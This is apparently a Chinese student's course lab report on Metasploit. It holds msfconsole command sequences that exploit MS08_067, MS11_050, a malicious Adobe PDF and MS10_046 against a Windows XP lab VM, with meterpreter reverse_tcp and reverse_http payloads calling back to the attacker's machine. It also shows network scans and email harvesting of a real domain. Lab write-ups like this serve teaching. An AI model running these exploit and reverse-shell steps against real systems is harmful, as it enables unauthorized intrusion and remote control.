• Exp5 MSF基础应用


    Exp5 MSF基础应用


    实验环境:

    靶机:window xp
    ip:192.168.247.145

    目标机:kali
    ip:192.168.247.141


    实验内容:

    实践一:主动攻击实践 MS17_010

    1. 使用namp扫描可攻击主机nmap -n -p445 --script smb-vuln-ms17-010 192.168.247.0/24 --open
    • 扫描结果显示,靶机ip:192.168.247.145 正好是我们的可怜的xp虚拟机。
    1. 找到目标准备下手了 ,在kali中打开msf search ms08_067收索一下经典的漏洞攻击模块。
    • 有警告居然说我慢!简直不能忍,解决它!

    • 解决办法看这里

    • 执行指令 use exploit/windows/smb/ms08_067_netapi去使用该模块。执行指令show targets 查看靶机信息

    • 执行指令show payloads 查看攻击载荷

    • 配置payload信息

    • 开始攻击

    • 失败了!!!难受 冷静一下检查配置信息!没错!!
      再冷静一下,检查 额 应该检查什么呢?

    分析一下出现这种情况的原因

    1)您使用的漏洞利用对您所选择的目标不起作用。可以
    是一个不同版本的漏洞,有一个问题 
    利用代码,或目标配置有问题。
    
    2)您使用的漏洞利用被配置为使用不创建的有效载荷 
    互动会话。在这种情况下,框架无法知道
    被剥削者是否工作,因为它没有收到连接 
    从目标成功时(例如运行记事本)。
    
    如果您尝试反向有效载荷,获取该消息和目标服务 
    不会崩溃,确保您的目标设置是正确的,而且 
    目标系统正在运行正确版本的易受攻击的软件。
    
    • 综上 应该是原因1 使用的漏洞对选择的目标不起作用
    • 换一个环境吧。。。还是出问题了

    漏洞学习参考

    实践二 : 针对浏览器的攻击:ms11_050

    实验步骤和实验一很相似,相同的部分略去。

    • payload信息当然是要给看的撒
    • 这是ms11_050_mshtml_cobjectelement 基本信息

    • 这是target信息

    • 这是Basic options:信息

    • 接下来配置payload信息

    • 开始攻击

    msf > use windows/browser/ms11_050_mshtml_cobjectelement
    msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http
    payload => windows/meterpreter/reverse_http
    msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set LHOST 192.168.247.141
    LHOST => 192.168.247.141
    msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set LPORT 5329
    LPORT => 5329
    msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set URIPATH hpl
    URIPATH => hpl
    msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > exploit 
    [*] Exploit running as background job 0.
    
    [*] Started HTTP reverse handler on http://192.168.247.141:5329
    [*] Using URL: http://0.0.0.0:8080/hpl
    [*] Local IP: http://192.168.247.141:8080/hpl
    [*] Server started.
    
    

    • 分析原因吧

    1) 应该是漏洞太老了,IE已经能检测到此漏洞

    • 解决:看看是否能加入信任站点(需要https协议的才能加入,失败)

    • 解决 :看看能不能对Internet进行重新设置。将杀毒防御功能降低,甚至关闭
      ,将防御降至最低,无效!

    • 结果 还是 失败了!!!

    • 总结一下:最后感觉还是攻击程序太经典了。

    针对Office软件的渗透攻击——MS10-087

    靶机:windowsXP Professional sp2
    
    Adobe版本:9.3
    
    1. 生成攻击文件20155329-2.pdf
    2. 传送到靶机XP(被腾讯检测出来了?没关系 加入新任区接着做)
    3. 在kali上输入back退出当前模块,进入监听模块,输入以下命令:
      msf exploit(windows/fileformat/adobe_cooltype_sing) > back
      msf > use exploit/multi/handler
      msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      msf exploit(multi/handler) > set LHOST 192.168.247.141
      LHOST => 192.168.247.141
      msf exploit(multi/handler) > set LPORT 5329
      LPORT => 5329
      msf exploit(multi/handler) > exploit
    4. 发现成功了耶!
    5. 试试幕后操纵的快感!

    快捷方式图标漏洞——MS10-046

    sf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    msf exploit(windows/browser/ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.247.141
    
    msf exploit(windows/browser/ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
    
    msf exploit(windows/browser/ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.247.141
    
    msf exploit(windows/browser/ms10_046_shortcut_icon_dllloader) > exploit
    
    

    额 又被发现。继续加入信任区,接着完成

    貌似加信任区不行了耶!,查看kali终端,进程died

    卸载腾讯管家,撸起袖子使劲干!

    测试一下吧,进入cmd(图中注释错了,windows中应该叫做cmd.exe)

    Metasploit————信息收集模块

    1. 端口扫描
    
        msf > use auxiliary/scanner/portscan/syn(使用portscan模块)
        msf auxiliary(syn) > show options
        msf auxiliary(syn) > set RHOSTS 192.168.247.142(目标)
        msf auxiliary(syn) > set THREADS 50(线程)
        msf auxiliary(syn) > exploit
    
    1. ssh服务器扫描
    
        msf > use auxiliary/scanner/ssh/ssh_version (使用ssh_version模块)
        msf auxiliary(ssh_version) > show options (查看选项)
        msf auxiliary(ssh_version) > set RHOSTS 192.168.247.0/24(目标网段)
        msf auxiliary(ssh_version) > set THREADS 50(线程)
        msf auxiliary(ssh_version) > exploit (开始)
    
    1. telent服务器扫描
    
        msf > use auxiliary/scanner/telnet/telnet_version (使用telnet_version模块)
        msf auxiliary(telnet_version) > show options (查看选项)
        msf auxiliary(telnet_version) > set RHOSTS 172.30.7.0/24(目标网段)
        msf auxiliary(telnet_version) > set THREADS 50(线程)
        msf auxiliary(telnet_version) > exploit (开始)
    
    • options
    • 结果
    • 明确我主机的IP直接收索我的主机172.30.7.254
    • 一点建议:Telnet服务是Internet上普遍采用的登录和仿真程序,也是TTS(Tiny Telnet Server)木马的缺省端口(23端口)。所以,建议关闭23端口。
    1. 收索网站中的Email地址
        msf > use auxiliary/gather/search_email_collector (使用search_email_collector模块)
        msf auxiliary(search_email_collector) > show options (查看选项)
        msf auxiliary(search_email_collector) > set DOMAIN baidu.com(扫描目标)
        msf auxiliary(search_email_collector) > exploit (开始)
    
    • options
    • 结果失败了。
    • 从提示看是打开Google浏览器的tcp连接失败。
    • 难道是我的outfile文件是no造成的?(未解)
    1. 扫描局域网有多少主机存活
    
        msf > use auxiliary/scanner/discovery/arp_sweep (使用discovery/arp_sweep模块)
        msf auxiliary(arp_sweep) > show options (查看选项)
        msf auxiliary(arp_sweep) > set RHOSTS 10.180.100.0/24(目标网段)
        msf auxiliary(arp_sweep) > set THREADS 50(线程)
        msf auxiliary(arp_sweep) > exploit (开始)
    
    
    • options and result

    一点想法

    • 实验做完,失败很多次,有的现在还没有成功,本来心态有点爆炸的,但是老师说攻防失败是正常的,成功才是偶然的。静下心来完成了之前剩下的实验。整个实验做完了,我们需要感受的是一个过程,而不是那个结果。
    • 整个实验中最重要的也是最基础的是信息的收集,所以把最后一部分给全做了。漏洞也是在信息收集中发现的。做好信息收集才能发现漏洞,才有后面的操作。

    基础问题

    • 用自己的话解释什么是exploit,payload,encode

    exploit 就是我们发现漏洞信息后,编写代码程序对目标漏洞攻击的一个过程,也是实验中不停的重复的那段操作
    payload 感觉就是一个运输工具,不停的在攻击机和靶机来回传输数据
    encode 是一种编码方式,和uncode差不多吧,也许是换一个编码方式,可以逃避靶机的检测,也能让自己的攻击程序更方便的识别

    参考资料————Metasploit的模块构成及功能介绍

    MS08_067漏洞学习研究

  • 相关阅读:
    Loj #6307. 「雅礼国庆 2017 Day1」Clique
    bzoj 4457: 游戏任务
    Codeforces 375 D Tree and Queries
    Codeforces 837 E Vasya's Function
    [POI2008]BLO
    Codeforces 451 E Devu and Flowers
    洛谷 P4318 完全平方数
    [JSOI2016]反质数序列
    bzoj 4320: ShangHai2006 Homework
    bzoj4454 C Language Practice
  • 原文地址:https://www.cnblogs.com/hpl20155329/p/8932882.html
Copyright © 2020-2023  润新知